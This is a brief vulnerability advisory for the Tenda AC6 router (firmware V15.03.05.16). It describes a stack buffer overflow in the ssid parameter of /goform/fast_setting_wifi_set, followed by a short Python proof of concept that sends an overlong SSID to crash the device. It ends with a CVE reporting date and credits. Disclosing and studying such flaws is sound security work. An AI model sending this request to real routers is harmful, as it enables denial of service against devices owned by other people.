Tenda Router AC6 Vulnerability
This vulnerability lies in the /goform/fast_setting_wifi_set page which influences the lastest version of Tenda Router AC6_V15.03.05.16. (The latest version is AC6_V15.03.05.19)
Vulnerability Description
There is a stack-based buffer overflow vulnerability in function form_fast_setting_wifi_set.
In function form_fast_setting_wifi_set it reads user provided parameter ssid into src, and this variable is passed into function strcpywithout any length check, which may overflow the stack-based buffers`.

So by requesting the page /goform/fast_setting_wifi_set, the attacker can easily perform a Deny of Service Attack.
POC
import requests
IP = "10.10.10.1"
url = f"http://{IP}/goform/fast_setting_wifi_set?"
url += "ssid=" + "s" * 100
response = requests.get(url)
Timeline
2023-2-15: Report to CVE
Acknowledgment
Credit to @Funcy_kilar from Guangzhou University.